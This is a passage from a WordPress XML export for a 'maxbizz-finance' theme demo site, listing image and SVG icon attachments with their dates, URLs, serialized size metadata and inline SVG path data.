<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>add</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/typography/add/</link>
		<pubDate>Mon, 07 Sep 2020 08:50:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/add.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>481</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:50:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:50:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[add]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/add.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/add.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/pheader-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>489</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:30:"2020/09/pheader-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:29:"pheader-about-us-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"pheader-about-us-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"pheader-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"pheader-about-us-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"pheader-about-us-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"pheader-about-us-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"pheader-about-us-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/image1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:25:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>491</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:25:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:25:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:630;s:6:"height";i:475;s:4:"file";s:29:"2020/09/image1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:29:"image1-about-us-1-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"image1-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"image1-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"image1-about-us-1-600x475.jpg";s:5:"width";i:600;s:6:"height";i:475;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/features1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>501</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:32:"2020/09/features1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"features1-about-us-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"features1-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"features1-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"features1-about-us-1-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/features2-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>502</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:32:"2020/09/features2-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"features2-about-us-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"features2-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"features2-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"features2-about-us-1-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features3-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/features3-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>503</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features3-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features3-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:32:"2020/09/features3-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"features3-about-us-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"features3-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"features3-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"features3-about-us-1-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/bg1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>504</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:570;s:4:"file";s:26:"2020/09/bg1-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"bg1-about-us-1-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"bg1-about-us-1-1024x304.jpg";s:5:"width";i:1024;s:6:"height";i:304;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"bg1-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"bg1-about-us-1-768x228.jpg";s:5:"width";i:768;s:6:"height";i:228;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"bg1-about-us-1-1536x456.jpg";s:5:"width";i:1536;s:6:"height";i:456;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"bg1-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"bg1-about-us-1-600x570.jpg";s:5:"width";i:600;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"bg1-about-us-1-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"bg1-about-us-1-1200x570.jpg";s:5:"width";i:1200;s:6:"height";i:570;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/image2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 03:38:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-about-us.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>508</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:38:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:38:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-about-us.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image2-about-us.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:516;s:6:"height";i:625;s:4:"file";s:29:"2020/09/image2-about-us.png";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"image2-about-us-1-248x300.png";s:5:"width";i:248;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"image2-about-us-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"image2-about-us-1-516x400.png";s:5:"width";i:516;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"image2-about-us-1-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"image2-about-us-1-516x600.png";s:5:"width";i:516;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/about-us/attachment/01/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01-2.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>510</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01-2.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01-2.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
